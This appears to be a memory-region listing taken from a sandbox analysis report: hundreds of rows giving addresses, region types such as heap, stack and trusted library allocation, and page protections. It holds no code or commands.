|
||
22BF86FA000
|
heap
|
page read and write
|
||
1B018B46000
|
heap
|
page read and write
|
||
1ACB0000
|
trusted library allocation
|
page read and write
|
||
1BC90000
|
trusted library allocation
|
page read and write
|
||
22BF858C000
|
heap
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
27474A60000
|
heap
|
page execute and read and write
|
||
2DF0000
|
trusted library allocation
|
page read and write
|
||
7FF887A6C000
|
trusted library allocation
|
page execute and read and write
|
||
22BF7C75000
|
heap
|
page read and write
|
||
7DF431870000
|
unkown
|
page read and write
|
||
7DF431880000
|
unkown
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
1B7F0000
|
trusted library allocation
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
23D22A27000
|
heap
|
page read and write
|
||
D35000
|
heap
|
page read and write
|
||
22BF85E2000
|
heap
|
page read and write
|
||
8A9000
|
unkown
|
page readonly
|
||
22BF86FA000
|
heap
|
page read and write
|
||
1B920000
|
trusted library allocation
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
1BAB0000
|
trusted library allocation
|
page read and write
|
||
1B07E4E0000
|
heap
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
595C000
|
heap
|
page read and write
|
||
22BF79FB000
|
heap
|
page read and write
|
||
7FF887AA0000
|
trusted library allocation
|
page read and write
|
||
22BF7C2A000
|
heap
|
page read and write
|
||
1BA30000
|
trusted library allocation
|
page read and write
|
||
22BF851C000
|
heap
|
page read and write
|
||
22BF7AAF000
|
heap
|
page read and write
|
||
22BF85EC000
|
heap
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
2B1B000
|
heap
|
page read and write
|
||
1AA60000
|
trusted library allocation
|
page read and write
|
||
2391000
|
trusted library allocation
|
page read and write
|
||
1B018B4E000
|
heap
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
22BF58A8000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
1B018BEF000
|
heap
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
22BF85C4000
|
heap
|
page read and write
|
||
22BF7C7D000
|
heap
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
598A000
|
heap
|
page read and write
|
||
22BF7A05000
|
heap
|
page read and write
|
||
2A5A8FB0000
|
unkown
|
page read and write
|
||
1B790000
|
trusted library allocation
|
page read and write
|
||
22BF7E3B000
|
unkown
|
page read and write
|
||
C40000
|
heap
|
page read and write
|
||
1B610000
|
trusted library allocation
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
22BF8543000
|
heap
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
22BF7C6A000
|
heap
|
page read and write
|
||
1BA90000
|
trusted library allocation
|
page read and write
|
||
22BF85F1000
|
heap
|
page read and write
|
||
1ACA4000
|
heap
|
page read and write
|
||
1B5C0000
|
trusted library allocation
|
page read and write
|
||
229C000
|
heap
|
page read and write
|
||
22BF8529000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
22BF85E4000
|
heap
|
page read and write
|
||
1B9C0000
|
trusted library allocation
|
page read and write
|
||
22BF85D4000
|
heap
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
22BF85DA000
|
heap
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
22BF851C000
|
heap
|
page read and write
|
||
CE0000
|
heap
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
7FF887A23000
|
trusted library allocation
|
page execute and read and write
|
||
44D2D3E000
|
stack
|
page read and write
|
||
22BF85EC000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
7FF887A14000
|
trusted library allocation
|
page read and write
|
||
1AADAFA0000
|
heap
|
page read and write
|
||
1C967000
|
unkown
|
page read and write
|
||
1B9F0000
|
trusted library allocation
|
page read and write
|
||
22BF7C27000
|
heap
|
page read and write
|
||
1AB53000
|
trusted library allocation
|
page read and write
|
||
1AA70000
|
trusted library allocation
|
page read and write
|
||
2B16000
|
heap
|
page read and write
|
||
23D22F21000
|
heap
|
page read and write
|
||
1B930000
|
trusted library allocation
|
page read and write
|
||
1BA10000
|
trusted library allocation
|
page read and write
|
||
2E00000
|
trusted library allocation
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
1AB57000
|
trusted library allocation
|
page read and write
|
||
22BF85CC000
|
heap
|
page read and write
|
||
A48937D000
|
stack
|
page read and write
|
||
1AB63000
|
trusted library allocation
|
page read and write
|
||
1E879DC1000
|
remote allocation
|
page execute and read and write
|
||
1CB4C7A0000
|
trusted library allocation
|
page read and write
|
||
22BF79F9000
|
heap
|
page read and write
|
||
7FF887DC0000
|
trusted library allocation
|
page read and write
|
||
250E000
|
stack
|
page read and write
|
||
24A2C938000
|
heap
|
page read and write
|
||
22BF8594000
|
heap
|
page read and write
|
||
22BF7C57000
|
heap
|
page read and write
|
||
22BF7C08000
|
heap
|
page read and write
|
||
22BF7AAB000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
2E00000
|
trusted library allocation
|
page read and write
|
||
22BF7C80000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
A4892F9000
|
stack
|
page read and write
|
||
22BF85EC000
|
heap
|
page read and write
|
||
22BF7C67000
|
heap
|
page read and write
|
||
7FF887C04000
|
trusted library allocation
|
page read and write
|
||
A709C0B000
|
stack
|
page read and write
|
||
22BF7A40000
|
heap
|
page read and write
|
||
1ACAA000
|
heap
|
page read and write
|
||
1B71E000
|
stack
|
page read and write
|
||
1B000060000
|
trusted library allocation
|
page read and write
|
||
7FF887C10000
|
trusted library allocation
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
1AB20000
|
trusted library allocation
|
page read and write
|
||
22BF7C75000
|
heap
|
page read and write
|
||
2745DF71000
|
trusted library allocation
|
page read and write
|
||
1B560000
|
direct allocation
|
page execute and read and write
|
||
22BF79FB000
|
heap
|
page read and write
|
||
2DE3000
|
trusted library allocation
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
22BF85CC000
|
heap
|
page read and write
|
||
1AC15000
|
trusted library allocation
|
page read and write
|
||
A7091BB000
|
stack
|
page read and write
|
||
1E879D80000
|
remote allocation
|
page execute and read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
22BF7C3F000
|
heap
|
page read and write
|
||
7FF887EA0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF887A73000
|
trusted library allocation
|
page execute and read and write
|
||
27474C81000
|
heap
|
page read and write
|
||
2745C200000
|
heap
|
page readonly
|
||
22BF85F1000
|
heap
|
page read and write
|
||
1AB63000
|
trusted library allocation
|
page read and write
|
||
7FF887D79000
|
trusted library allocation
|
page read and write
|
||
25B0000
|
trusted library allocation
|
page read and write
|
||
1AC40000
|
trusted library allocation
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
1BA80000
|
trusted library allocation
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
7FF887B30000
|
trusted library allocation
|
page read and write
|
||
22BF7C6A000
|
heap
|
page read and write
|
||
1AADB130000
|
heap
|
page readonly
|
||
22BF58BE000
|
heap
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
B3B000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
44D2E3C000
|
stack
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
7FF887A80000
|
trusted library allocation
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
7FF887C50000
|
trusted library allocation
|
page read and write
|
||
1B7B0000
|
direct allocation
|
page read and write
|
||
23D22A16000
|
heap
|
page read and write
|
||
1B9B0000
|
trusted library allocation
|
page read and write
|
||
1B700000
|
trusted library allocation
|
page read and write
|
||
22BF58BD000
|
heap
|
page read and write
|
||
27474C67000
|
heap
|
page read and write
|
||
1B018AFE000
|
heap
|
page read and write
|
||
22BF85D4000
|
heap
|
page read and write
|
||
22BF7C0F000
|
heap
|
page read and write
|
||
22BF7AB8000
|
heap
|
page read and write
|
||
22BF85D4000
|
heap
|
page read and write
|
||
22BF85F5000
|
heap
|
page read and write
|
||
1B563000
|
trusted library allocation
|
page read and write
|
||
22BF7C27000
|
heap
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
1F0000
|
trusted library section
|
page read and write
|
||
22BF855C000
|
heap
|
page read and write
|
||
22BF58B0000
|
heap
|
page read and write
|
||
22BF7A28000
|
heap
|
page read and write
|
||
22BF7B4E000
|
heap
|
page read and write
|
||
23D229A1000
|
heap
|
page read and write
|
||
22BF7A03000
|
heap
|
page read and write
|
||
1B555000
|
trusted library allocation
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
22BF850B000
|
heap
|
page read and write
|
||
1BC80000
|
trusted library allocation
|
page read and write
|
||
1B710000
|
trusted library allocation
|
page read and write
|
||
1AB67000
|
trusted library allocation
|
page read and write
|
||
1BBE0000
|
trusted library allocation
|
page read and write
|
||
1CB5B294000
|
trusted library allocation
|
page read and write
|
||
22BF7AAA000
|
heap
|
page read and write
|
||
1AB65000
|
trusted library allocation
|
page read and write
|
||
1BC70000
|
trusted library allocation
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
7FF887A92000
|
trusted library allocation
|
page read and write
|
||
1B570000
|
trusted library allocation
|
page read and write
|
||
22BF79FB000
|
heap
|
page read and write
|
||
1AA60000
|
trusted library allocation
|
page read and write
|
||
22BF7AAE000
|
heap
|
page read and write
|
||
1B560000
|
trusted library allocation
|
page read and write
|
||
22BF8584000
|
heap
|
page read and write
|
||
22BF85CC000
|
heap
|
page read and write
|
||
7FF887F00000
|
trusted library allocation
|
page read and write
|
||
22BF7A99000
|
heap
|
page read and write
|
||
274747CD000
|
heap
|
page read and write
|
||
22BF7AAC000
|
heap
|
page read and write
|
||
1AF3D000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
26DD000
|
trusted library allocation
|
page read and write
|
||
22BF7C67000
|
heap
|
page read and write
|
||
1AB63000
|
trusted library allocation
|
page read and write
|
||
22BF7C28000
|
heap
|
page read and write
|
||
22BF7AB7000
|
heap
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
1AC73000
|
heap
|
page read and write
|
||
22BF7C0F000
|
heap
|
page read and write
|
||
1B7C0000
|
trusted library allocation
|
page read and write
|
||
44D267E000
|
stack
|
page read and write
|
||
1B0000
|
heap
|
page read and write
|
||
B47000
|
heap
|
page read and write
|
||
22BF7C23000
|
heap
|
page read and write
|
||
2745A81F000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
22BF7C4F000
|
heap
|
page read and write
|
||
1AD0A000
|
heap
|
page read and write
|
||
7FF887AAC000
|
trusted library allocation
|
page execute and read and write
|
||
1B010651000
|
trusted library allocation
|
page read and write
|
||
22BF8533000
|
heap
|
page read and write
|
||
27474B03000
|
heap
|
page read and write
|
||
1B001F09000
|
trusted library allocation
|
page read and write
|
||
22BF85B4000
|
heap
|
page read and write
|
||
5A05000
|
heap
|
page read and write
|
||
2E15000
|
heap
|
page read and write
|
||
22BF7C6A000
|
heap
|
page read and write
|
||
22BF7A41000
|
heap
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
22BF7A19000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
1B790000
|
trusted library allocation
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
1CB634D6000
|
heap
|
page read and write
|
||
22BF7A47000
|
heap
|
page read and write
|
||
22BF7C37000
|
heap
|
page read and write
|
||
7DF473620000
|
trusted library allocation
|
page execute and read and write
|
||
22BF79FB000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
23D210D8000
|
heap
|
page read and write
|
||
22BF7AB7000
|
heap
|
page read and write
|
||
1AC50000
|
trusted library allocation
|
page read and write
|
||
1B950000
|
trusted library allocation
|
page read and write
|
||
1AF8F000
|
heap
|
page read and write
|
||
1BBD0000
|
trusted library allocation
|
page read and write
|
||
22BF85CC000
|
heap
|
page read and write
|
||
1B018AB6000
|
heap
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
7DF406960000
|
trusted library allocation
|
page execute and read and write
|
||
2B31000
|
heap
|
page read and write
|
||
895000
|
unkown
|
page readonly
|
||
7FF887B26000
|
trusted library allocation
|
page read and write
|
||
22BF7C6A000
|
heap
|
page read and write
|
||
1B07E0C0000
|
heap
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
1CB4C796000
|
trusted library allocation
|
page read and write
|
||
22BF85BC000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
7FF887A13000
|
trusted library allocation
|
page execute and read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
1B480000
|
trusted library allocation
|
page read and write
|
||
2745D3CA000
|
trusted library allocation
|
page read and write
|
||
1B010637000
|
trusted library allocation
|
page read and write
|
||
2745C2D3000
|
heap
|
page read and write
|
||
1BB23000
|
trusted library allocation
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
22BF85DA000
|
heap
|
page read and write
|
||
A708F3E000
|
stack
|
page read and write
|
||
22BF58AC000
|
heap
|
page read and write
|
||
7FF887ACC000
|
trusted library allocation
|
page execute and read and write
|
||
1B4D0000
|
trusted library allocation
|
page read and write
|
||
1B770000
|
trusted library section
|
page read and write
|
||
22BF58AC000
|
heap
|
page read and write
|
||
1C860000
|
unkown
|
page read and write
|
||
2BC0000
|
heap
|
page read and write
|
||
22BF7B4E000
|
heap
|
page read and write
|
||
1AC9E000
|
heap
|
page read and write
|
||
1B7E0000
|
trusted library allocation
|
page read and write
|
||
22BF85CC000
|
heap
|
page read and write
|
||
1B0187D6000
|
heap
|
page execute and read and write
|
||
897000
|
unkown
|
page read and write
|
||
7FF887C80000
|
trusted library allocation
|
page read and write
|
||
1B07E4E5000
|
heap
|
page read and write
|
||
1AA70000
|
trusted library allocation
|
page read and write
|
||
22BF7C15000
|
heap
|
page read and write
|
||
1B9D0000
|
trusted library allocation
|
page read and write
|
||
22BF7C70000
|
heap
|
page read and write
|
||
1B07E270000
|
heap
|
page read and write
|
||
1BB90000
|
trusted library allocation
|
page read and write
|
||
23D22ADE000
|
heap
|
page read and write
|
||
7FF887BE0000
|
trusted library allocation
|
page execute and read and write
|
||
22BF85D4000
|
heap
|
page read and write
|
||
2A5A8FF9000
|
unkown
|
page read and write
|
||
6A7000
|
unkown
|
page readonly
|
||
22BF85EC000
|
heap
|
page read and write
|
||
22BF85BC000
|
heap
|
page read and write
|
||
1BA60000
|
trusted library allocation
|
page read and write
|
||
7FF887C60000
|
trusted library allocation
|
page execute and read and write
|
||
7FF7177BC000
|
unkown
|
page readonly
|
||
22BF7C68000
|
heap
|
page read and write
|
||
22BF7A28000
|
heap
|
page read and write
|
||
22BF7A08000
|
heap
|
page read and write
|
||
44D23F3000
|
stack
|
page read and write
|
||
7DF470110000
|
trusted library allocation
|
page execute and read and write
|
||
1B000351000
|
trusted library allocation
|
page read and write
|
||
1B570000
|
trusted library allocation
|
page read and write
|
||
1BA20000
|
trusted library allocation
|
page read and write
|
||
1ADAE000
|
heap
|
page read and write
|
||
22BF852E000
|
heap
|
page read and write
|
||
1BBB6000
|
trusted library allocation
|
page read and write
|
||
1BB60000
|
trusted library allocation
|
page read and write
|
||
2A5A912E000
|
heap
|
page read and write
|
||
23D22AA7000
|
heap
|
page read and write
|
||
1BC03000
|
trusted library allocation
|
page read and write
|
||
7FF887B3C000
|
trusted library allocation
|
page execute and read and write
|
||
7FF887A1D000
|
trusted library allocation
|
page execute and read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
233D000
|
stack
|
page read and write
|
||
1AA90000
|
trusted library allocation
|
page read and write
|
||
1B5B0000
|
trusted library allocation
|
page read and write
|
||
22BF7A1D000
|
heap
|
page read and write
|
||
22BF7C27000
|
heap
|
page read and write
|
||
22BF7CC0000
|
unkown
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
22BF85B4000
|
heap
|
page read and write
|
||
44D2C3E000
|
stack
|
page read and write
|
||
1AADB165000
|
heap
|
page read and write
|
||
22BF79FB000
|
heap
|
page read and write
|
||
22BF8534000
|
heap
|
page read and write
|
||
1ACA0000
|
heap
|
page read and write
|
||
C6F000
|
heap
|
page read and write
|
||
1B820000
|
trusted library allocation
|
page read and write
|
||
1AEF0000
|
trusted library allocation
|
page read and write
|
||
150000
|
heap
|
page read and write
|
||
A4896BF000
|
stack
|
page read and write
|
||
22BF7C6A000
|
heap
|
page read and write
|
||
1CB4B671000
|
trusted library allocation
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
1BBE0000
|
trusted library allocation
|
page read and write
|
||
1B880000
|
trusted library allocation
|
page read and write
|
||
22BF7C6A000
|
heap
|
page read and write
|
||
22BF85D4000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
22BF7A28000
|
heap
|
page read and write
|
||
22BF7AA8000
|
heap
|
page read and write
|
||
7FF887A2D000
|
trusted library allocation
|
page execute and read and write
|
||
22BF7C6A000
|
heap
|
page read and write
|
||
22BF7AAC000
|
heap
|
page read and write
|
||
2745C411000
|
trusted library allocation
|
page read and write
|
||
A4894BB000
|
stack
|
page read and write
|
||
7FF887B00000
|
trusted library allocation
|
page execute and read and write
|
||
2C83000
|
heap
|
page read and write
|
||
27474837000
|
heap
|
page read and write
|
||
1CB63420000
|
heap
|
page read and write
|
||
7FF782969000
|
direct allocation
|
page execute and read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
22BF79F9000
|
heap
|
page read and write
|
||
22BF85E4000
|
heap
|
page read and write
|
||
1B750000
|
trusted library allocation
|
page read and write
|
||
22BF7C6A000
|
heap
|
page read and write
|
||
F4F000
|
stack
|
page read and write
|
||
22BF85DC000
|
heap
|
page read and write
|
||
22BF7E19000
|
heap
|
page read and write
|
||
22BF851D000
|
heap
|
page read and write
|
||
22BF85B4000
|
heap
|
page read and write
|
||
22BF7C6A000
|
heap
|
page read and write
|
||
22BF85E4000
|
heap
|
page read and write
|
||
22BF858D000
|
heap
|
page read and write
|
||
22BF85BC000
|
heap
|
page read and write
|
||
22BF8543000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
1AB50000
|
trusted library allocation
|
page read and write
|
||
1AADAE20000
|
unkown
|
page read and write
|
||
1CB4B0E1000
|
trusted library allocation
|
page read and write
|
||
1AEC0000
|
trusted library allocation
|
page read and write
|
||
1B6A0000
|
trusted library allocation
|
page read and write
|
||
7FF887BFA000
|
trusted library allocation
|
page read and write
|
||
7FF887DA0000
|
trusted library allocation
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
27474C59000
|
heap
|
page read and write
|
||
22BF7C28000
|
heap
|
page read and write
|
||
A7087CE000
|
stack
|
page read and write
|
||
23D229BD000
|
heap
|
page read and write
|
||
1B566000
|
trusted library allocation
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
7FF887EE0000
|
trusted library allocation
|
page read and write
|
||
22BF85E4000
|
heap
|
page read and write
|
||
1AE48000
|
trusted library allocation
|
page read and write
|
||
1CB5B3DB000
|
trusted library allocation
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
1B001687000
|
trusted library allocation
|
page read and write
|
||
22BF85D4000
|
heap
|
page read and write
|
||
22BF7A9E000
|
heap
|
page read and write
|
||
1B480000
|
trusted library allocation
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
7FF8DF028000
|
unkown
|
page readonly
|
||
22BF7C48000
|
heap
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
7FF887C00000
|
trusted library allocation
|
page execute and read and write
|
||
1CB4B16A000
|
trusted library allocation
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
22BF79FB000
|
heap
|
page read and write
|
||
22BF7C57000
|
heap
|
page read and write
|
||
22BF7A52000
|
heap
|
page read and write
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
23D20EDB000
|
heap
|
page read and write
|
||
22BF85B4000
|
heap
|
page read and write
|
||
1B560000
|
trusted library allocation
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
22BF7C6A000
|
heap
|
page read and write
|
||
59F6000
|
heap
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
23D229BD000
|
heap
|
page read and write
|
||
22BF85A4000
|
heap
|
page read and write
|
||
1B660000
|
trusted library allocation
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
1B461000
|
trusted library allocation
|
page read and write
|
||
22BF85D4000
|
heap
|
page read and write
|
||
1B4DF000
|
trusted library allocation
|
page read and write
|
||
22BF85E4000
|
heap
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
1B018BF3000
|
heap
|
page read and write
|
||
21B5000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
1AB50000
|
trusted library allocation
|
page read and write
|
||
7FF887BE0000
|
trusted library allocation
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
23D229CA000
|
heap
|
page read and write
|
||
1AC92000
|
heap
|
page read and write
|
||
1B79A000
|
stack
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
1ACD1000
|
heap
|
page read and write
|
||
E445BCF000
|
stack
|
page read and write
|
||
7FF887D30000
|
trusted library allocation
|
page read and write
|
||
1AC65000
|
heap
|
page read and write
|
||
1B018BDB000
|
heap
|
page read and write
|
||
27474F49000
|
heap
|
page read and write
|
||
1AADAE7F000
|
unkown
|
page execute and read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
22BF79FB000
|
heap
|
page read and write
|
||
22BF7C50000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
22BF7E1B000
|
heap
|
page read and write
|
||
1B0021EA000
|
trusted library allocation
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
1AA50000
|
trusted library allocation
|
page read and write
|
||
1C770000
|
unkown
|
page read and write
|
||
22BF5887000
|
heap
|
page read and write
|
||
22BF85F5000
|
heap
|
page read and write
|
||
22BF85CC000
|
heap
|
page read and write
|
||
22BF8594000
|
heap
|
page read and write
|
||
22BF85E4000
|
heap
|
page read and write
|
||
5A02000
|
heap
|
page read and write
|
||
27474BF9000
|
heap
|
page read and write
|
||
22BF858C000
|
heap
|
page read and write
|
||
22BF7C70000
|
heap
|
page read and write
|
||
1CB4C784000
|
trusted library allocation
|
page read and write
|
||
22BF851C000
|
heap
|
page read and write
|
||
1CAF5000
|
unkown
|
page read and write
|
||
22BF7C3F000
|
heap
|
page read and write
|
||
22BF8534000
|
heap
|
page read and write
|
||
22BF7A03000
|
heap
|
page read and write
|
||
22BF79FA000
|
heap
|
page read and write
|
||
1B940000
|
trusted library allocation
|
page read and write
|
||
26A6000
|
trusted library allocation
|
page read and write
|
||
22BF79FB000
|
heap
|
page read and write
|
||
22BF8564000
|
heap
|
page read and write
|
||
22BF85D4000
|
heap
|
page read and write
|
||
22BF7A22000
|
heap
|
page read and write
|
||
27474C3D000
|
heap
|
page read and write
|
||
1B830000
|
trusted library allocation
|
page read and write
|
||
1B000040000
|
trusted library allocation
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
7DF431884000
|
unkown
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
22BF79FB000
|
heap
|
page read and write
|
||
22BF85EC000
|
heap
|
page read and write
|
||
1B018786000
|
heap
|
page read and write
|
||
7FF887A4D000
|
trusted library allocation
|
page execute and read and write
|
||
1B780000
|
trusted library allocation
|
page read and write
|
||
5979000
|
heap
|
page read and write
|
||
1B0188E0000
|
trusted library allocation
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
2746C6FF000
|
trusted library allocation
|
page read and write
|
||
7FF887C20000
|
trusted library allocation
|
page read and write
|
||
1B460000
|
trusted library allocation
|
page read and write
|
||
1AEB0000
|
trusted library allocation
|
page read and write
|
||
1CB4C8CE000
|
trusted library allocation
|
page read and write
|
||
2A5AAC41000
|
heap
|
page read and write
|
||
22BF7C08000
|
heap
|
page read and write
|
||
44D2DBF000
|
stack
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
22BF85F1000
|
heap
|
page read and write
|
||
1B550000
|
trusted library allocation
|
page read and write
|
||
895000
|
unkown
|
page readonly
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
1B7B0000
|
trusted library allocation
|
page read and write
|
||
22BF7AAB000
|
heap
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
1B010351000
|
trusted library allocation
|
page read and write
|
||
2745C1F0000
|
trusted library allocation
|
page read and write
|
||
22BF851F000
|
heap
|
page read and write
|
||
22BF7C6A000
|
heap
|
page read and write
|
||
BE0000
|
trusted library allocation
|
page read and write
|
||
7FF887C40000
|
trusted library allocation
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
1AB10000
|
trusted library allocation
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
1BC90000
|
trusted library allocation
|
page read and write
|
||
22BF7EB0000
|
unkown
|
page read and write
|
||
22BF7C37000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
22BF851E000
|
heap
|
page read and write
|
||
22BF7A14000
|
heap
|
page read and write
|
||
A7090BC000
|
stack
|
page read and write
|
||
22BF7C0F000
|
heap
|
page read and write
|
||
7FF887BE0000
|
trusted library allocation
|
page read and write
|
||
1B630000
|
trusted library allocation
|
page read and write
|
||
27474C8D000
|
heap
|
page read and write
|
||
7FF887B20000
|
trusted library allocation
|
page read and write
|
||
22BF8540000
|
heap
|
page read and write
|
||
22BF85CC000
|
heap
|
page read and write
|
||
2745E1E5000
|
trusted library allocation
|
page read and write
|
||
1B000340000
|
heap
|
page execute and read and write
|
||
1AC10000
|
heap
|
page read and write
|
||
2746C441000
|
trusted library allocation
|
page read and write
|
||
2400000
|
trusted library allocation
|
page read and write
|
||
7FF887A3D000
|
trusted library allocation
|
page execute and read and write
|
||
1AC11000
|
heap
|
page read and write
|
||
1B000163000
|
heap
|
page read and write
|
||
1B0186B2000
|
heap
|
page read and write
|
||
1AEF0000
|
trusted library allocation
|
page read and write
|
||
1AE10000
|
trusted library allocation
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
1BB70000
|
trusted library allocation
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
22BF7C40000
|
heap
|
page read and write
|
||
7FF887CA0000
|
trusted library allocation
|
page read and write
|
||
22BF7A99000
|
heap
|
page read and write
|
||
22BF853B000
|
heap
|
page read and write
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
22BF7A03000
|
heap
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
23D229E0000
|
heap
|
page read and write
|
||
22BF85F1000
|
heap
|
page read and write
|
||
7FF887D40000
|
trusted library allocation
|
page read and write
|
||
23D20D90000
|
heap
|
page read and write
|
||
1AA77000
|
trusted library allocation
|
page read and write
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
22BF85B4000
|
heap
|
page read and write
|
||
22BF7AAB000
|
heap
|
page read and write
|
||
7FF887E60000
|
trusted library allocation
|
page read and write
|
||
7FF887D90000
|
trusted library allocation
|
page read and write
|
||
1B780000
|
trusted library allocation
|
page read and write
|
||
22BF7A99000
|
heap
|
page read and write
|
||
1CB63666000
|
heap
|
page read and write
|
||
22BF7C13000
|
heap
|
page read and write
|
||
22BF7C1F000
|
heap
|
page read and write
|
||
1B750000
|
trusted library allocation
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
22BF85C7000
|
heap
|
page read and write
|
||
1BAA7000
|
trusted library allocation
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
22BF7C1F000
|
heap
|
page read and write
|
||
7FF887C2A000
|
trusted library allocation
|
page read and write
|
||
1BB00000
|
trusted library allocation
|
page read and write
|
||
22BF85A4000
|
heap
|
page read and write
|
||
1AB20000
|
trusted library allocation
|
page read and write
|
||
59EA000
|
heap
|
page read and write
|
||
2745AB90000
|
heap
|
page read and write
|
||
22BF7C37000
|
heap
|
page read and write
|
||
1BAF0000
|
trusted library allocation
|
page read and write
|
||
22BF85BC000
|
heap
|
page read and write
|
||
1AB60000
|
